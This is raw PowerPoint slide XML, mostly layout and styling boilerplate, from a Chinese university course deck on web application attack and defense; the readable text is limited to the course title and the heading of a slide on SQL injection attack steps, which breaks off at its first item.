            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4290584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ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{519535F7-5351-E14C-A73A-194DEFCD5AC9}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>2022年10月24日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6" name="Rectangle 1032"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{B8FF433E-49B7-5347-8F80-BD7A2435EC20}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="329775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0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2385C84D-2A12-3149-ACA6-AFE510FC2D8C}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>2022年10月24日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6" name="Rectangle 1032"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{5433E9B3-1D74-9845-8621-506C7AE1E84C}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4079059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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{EB43AADD-AF97-DC4A-97BA-07F9855E5275}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>2022年10月24日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7" name="Rectangle 1032"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{656871CB-C904-8242-8377-C8C1C7AB0735}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20173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0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{CEAE2293-1E8A-704A-AE50-0FF8DE522096}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>2022年10月24日</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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9" name="Rectangle 1032"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{E006E17F-5518-DC44-A204-C2F42E1E0DB3}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94074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0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{7A8C7BD2-AD22-CF4C-8FE6-1021C8D7D95A}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>2022年10月24日</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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5" name="Rectangle 1032"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{02EBDB56-5E44-D048-AD5E-173B21FD67BD}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3489855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30"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{5DDD9775-5101-AD4E-B6F2-EECAEF846771}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>2022年10月24日</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3"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4" name="Rectangle 1032"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3947675B-8DC4-514E-A3BA-B30DCC6A1C64}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186531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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{88B152BC-F66D-6645-AD90-ED0D1FA9A09C}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>2022年10月24日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7" name="Rectangle 1032"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{0DB2EB44-4057-9543-A423-E4C75D64F7FB}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104646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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{5F8C231D-0108-D845-851D-844A4774DD19}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>2022年10月24日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7" name="Rectangle 1032"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{E7A0EF53-82E6-BF42-90B2-8DD8634E1691}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4177032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1" name="Rectangle 1027"/>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AutoShape 1028"/>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defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4101" name="Line 1029"/>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lgn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4102" name="Rectangle 1030"/>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30CF555F-670C-324C-AF24-E4704584EE63}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>2022年10月24日</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4103" name="Rectangle 1031"/>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4104" name="Rectangle 1032"/>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4DD10993-8F87-2549-9C51-F7DB2C05B5AB}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2057" name="Picture 1034" descr="xiaoHui"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8243888" y="0"/>
            <a:ext cx="900112"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2"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hf hdr="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="宋体" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
          <a:cs typeface="宋体" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
          <a:cs typeface="宋体" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
          <a:cs typeface="宋体" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
          <a:cs typeface="宋体" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4200" b="1">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charset="0"/>
        <a:buChar char="o"/>
        <a:defRPr sz="3000" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="宋体" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="908050" indent="-436563" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="accent2"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="0"/>
        <a:buChar char="n"/>
        <a:defRPr sz="2600" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="宋体" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1304925" indent="-395288" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="accent2"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="0"/>
        <a:buChar char="o"/>
        <a:defRPr sz="2300" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="宋体" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1693863" indent="-387350" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="accent2"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="0"/>
        <a:buChar char="n"/>
        <a:defRPr sz="2000" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="宋体" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2093913" indent="-398463" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="25000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="accent2"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="0"/>
        <a:buChar char="§"/>
        <a:defRPr sz="2000" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="宋体" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="25511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E177B736-9C3C-2241-B3C4-8EABBD0B0975}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>2022年10月24日</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410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7A3AB1DE-8E41-0A43-91D9-6C317481AB21}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4102" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323850" y="1400175"/>
            <a:ext cx="8496300" cy="1150938"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>电子科技大学</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>网络与系统攻击技术课程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4104" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="250825" y="0"/>
            <a:ext cx="84963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endParaRPr lang="zh-CN" sz="3600" b="1">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4105" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323850" y="2420938"/>
            <a:ext cx="849630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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>应用安全攻防技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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60648"/>
            <a:ext cx="8001000" cy="675928"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实际</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入攻击步骤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
